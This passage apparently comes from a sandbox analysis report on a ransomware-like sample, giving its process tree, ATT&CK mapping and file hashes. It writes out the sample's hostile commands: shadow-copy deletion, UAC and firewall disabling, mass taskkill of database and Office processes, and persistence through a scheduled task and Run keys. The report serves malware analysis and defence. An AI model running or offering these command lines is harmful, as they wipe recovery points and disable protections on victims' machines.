- Suspicious use of WriteProcessMemory
PID:808

C:\Windows\SysWOW64\tasklist.exe
tasklist /v /fo csv
3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:796

C:\Windows\SysWOW64\findstr.exe
findstr /i "dcdcf"
3⤵
PID:1032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ver
2⤵
PID:1796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1820

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat
4⤵
PID:1624

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:832

C:\Windows\SysWOW64\tasklist.exe
tasklist /v
5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632

C:\Windows\SysWOW64\find.exe
find /I /c "dcdcf"
5⤵
PID:1176

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
5⤵
- Interacts with shadow copies
PID:1260

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:672

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:1728

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:552

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:1860

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1740

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:1060

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:1048

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:560

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:364

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:2004

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1780

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:968

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:292

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1708

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:1928

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:1060

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:688

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:1396

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:580

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1588

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:972

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:840

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:968

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:1872

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:1360

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:268

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f
3⤵
- Creates scheduled task(s)
PID:560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
2⤵
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\SysWOW64\nslookup.exe
nslookup myip.opendns.com. resolver1.opendns.com
3⤵
PID:1512

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo %date%-%time%
2⤵
PID:1924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
2⤵
PID:1776

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
3⤵
- Gathers system information
PID:964

C:\Windows\SysWOW64\find.exe
find /i "os name"
3⤵
PID:2028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
2⤵
PID:1612

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
3⤵
- Gathers system information
PID:1160

C:\Windows\SysWOW64\find.exe
find /i "original"
3⤵
PID:1540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
2⤵
PID:556

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- Modifies registry key
PID:856

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
3⤵
- Interacts with shadow copies
PID:772

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:460

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
3⤵
PID:2020

C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode mode=disable
3⤵
PID:624

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
3⤵
PID:1524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
2⤵
PID:1572

C:\Windows\SysWOW64\taskkill.exe
taskkill /im notepad.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Windows\SysWOW64\taskkill.exe
taskkill /im msftesql.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlagent.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1740

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlbrowser.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:316

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlservr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:820

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlwriter.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:364

C:\Windows\SysWOW64\taskkill.exe
taskkill /im oracle.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1396

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocssd.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1364

C:\Windows\SysWOW64\taskkill.exe
taskkill /im dbsnmp.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\SysWOW64\taskkill.exe
taskkill /im synctime.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1244

C:\Windows\SysWOW64\taskkill.exe
taskkill /im agntsvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1552

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mydesktopqos.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:920

C:\Windows\SysWOW64\taskkill.exe
taskkill /im isqlplussvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:932

C:\Windows\SysWOW64\taskkill.exe
taskkill /im xfssvccon.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1272

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mydesktopservice.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:560

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocautoupds.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1984

C:\Windows\SysWOW64\taskkill.exe
taskkill /im agntsvc.exe
3⤵
- Kills process with taskkill
PID:268

C:\Windows\SysWOW64\taskkill.exe
taskkill /im encsvc.exe
3⤵
- Kills process with taskkill
PID:292

C:\Windows\SysWOW64\taskkill.exe
taskkill /im firefoxconfig.exe
3⤵
- Kills process with taskkill
PID:964

C:\Windows\SysWOW64\taskkill.exe
taskkill /im tbirdconfig.exe
3⤵
- Kills process with taskkill
PID:1044

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocomm.exe
3⤵
- Kills process with taskkill
PID:1776

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld.exe
3⤵
- Kills process with taskkill
PID:1612

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld-nt.exe
3⤵
- Kills process with taskkill
PID:1728

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld-opt.exe
3⤵
- Kills process with taskkill
PID:1664

C:\Windows\SysWOW64\taskkill.exe
taskkill /im dbeng50.exe
3⤵
- Kills process with taskkill
PID:1060

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqbcoreservice.exe
3⤵
- Kills process with taskkill
PID:1300

C:\Windows\SysWOW64\taskkill.exe
taskkill /im excel.exe
3⤵
- Kills process with taskkill
PID:460

C:\Windows\SysWOW64\taskkill.exe
taskkill /im infopath.exe
3⤵
- Kills process with taskkill
PID:1924

C:\Windows\SysWOW64\taskkill.exe
taskkill /im msaccess.exe
3⤵
- Kills process with taskkill
PID:2028

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mspub.exe
3⤵
- Kills process with taskkill
PID:624

C:\Windows\SysWOW64\taskkill.exe
taskkill /im onenote.exe
3⤵
- Kills process with taskkill
PID:1524

C:\Windows\SysWOW64\taskkill.exe
taskkill /im outlook.exe
3⤵
- Kills process with taskkill
PID:1520

C:\Windows\SysWOW64\taskkill.exe
taskkill /im powerpnt.exe
3⤵
- Kills process with taskkill
PID:864

C:\Windows\SysWOW64\taskkill.exe
taskkill /im steam.exe
3⤵
- Kills process with taskkill
PID:1732

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thebat.exe
3⤵
- Kills process with taskkill
PID:1548

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thebat64.exe
3⤵
- Kills process with taskkill
PID:1272

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thunderbird.exe
3⤵
- Kills process with taskkill
PID:688

C:\Windows\SysWOW64\taskkill.exe
taskkill /im visio.exe
3⤵
- Kills process with taskkill
PID:580

C:\Windows\SysWOW64\taskkill.exe
taskkill /im winword.exe
3⤵
- Kills process with taskkill
PID:1780

C:\Windows\SysWOW64\taskkill.exe
taskkill /im wordpad.exe
3⤵
- Kills process with taskkill
PID:1260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
2⤵
PID:1708

C:\Windows\SysWOW64\reg.exe
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
3⤵
PID:1728

C:\Windows\SysWOW64\reg.exe
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
3⤵
- Modifies registry key
PID:672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
2⤵
PID:564

C:\Windows\SysWOW64\reg.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
3⤵
- Adds Run key to start application
- Modifies registry key
PID:1732

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
3⤵
- Adds Run key to start application
PID:1944

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:796

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1916

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Read_Me!_.txt
1⤵
PID:1060

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\ReadMe_Now!.hta"
1⤵
PID:1916

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Bypass User Account Control

1

T1088

Scheduled Task

1

T1053

Defense Evasion

Bypass User Account Control

1

T1088

Disabling Security Tools

1

T1089

Modify Registry

3

T1112

File Deletion

2

T1107

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

3

T1082

Process Discovery

1

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Read_Me!_.txt
MD5
afa801e9f586814b53da66d6196c720f

SHA1
12f99bbd9511b0019b536a93d06d1bbf08ac61ef

SHA256
a051c413afada6b6506e4095ad94a9016ba48b675a2596473dd1dcf57dcbc410

SHA512
c220e8ba63eadef8cfa866939a201f6a324452516f97aa084e87db0a2bb676c6f16dea7d9ce799f8cf709858adbbcb14678f0299ad0eaad8e615be204b00637e

Download Submit
C:\Users\Admin\AppData\h4_svc.bat
MD5
ead5cad574fa019df970900e07e76afd

SHA1
2bf7be0a9b3f174eaccd0a89310699f7b15fed02

SHA256
7de41bf6be3b821fb2ff4a2f8b7f6772d407c0bdf1bccfd9c19207ab1f07440f

SHA512
16aa662012c6ed8c50cb45f0487ff10081201c0091ccd86b4ae5235e72ef696a188f9acb5f91e8a59b95cac7b5d8b1c89328f32714f51d201db94e0a0aae5c87

Download Submit
C:\Users\Admin\AppData\t2_svc.bat
MD5
702f5dc6f9dec28c8c9b7b6885c9fe09

SHA1
dbb85da6de899deb21ce0a8f25c1726cd19e49e8

SHA256
20bf5224af318c449407c99e5f4628f71b874463a1cb777031a43b6236ab97e9

SHA512
fa4bfc3ac77561585d03bf62e7bb4de0602cf442b5c54b70945f8c75114d111559f50ad36026e2bb1027323f7f50130b7c60bee22835400a8a07feab436ccff7

Download Submit
C:\Users\Admin\AppData\v9_svc.vbs
MD5
e9c50acda9063b2462697bdbd0a0dfe2

SHA1
d1a2bc54905ce0e9121f8e5c249e0527f2190b7e

SHA256
f236c75a867944ce27e123b3aaf3a465084bc6135dc453f7f4aacb1cbf9946bd

SHA512
d5cd841b82867e323f5cd28f97c9a27ea32be1b3793cb7ddff1ccc3c0559c6b3758f6366d259eda2265431f67a1eebe41dcfb2047ee94c515eb458af6311b8a9

Download Submit
memory/796-59-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp

Filesize
8KB

Download
memory/1604-53-0x0000000075531000-0x0000000075533000-memory.dmp

Filesize
8KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads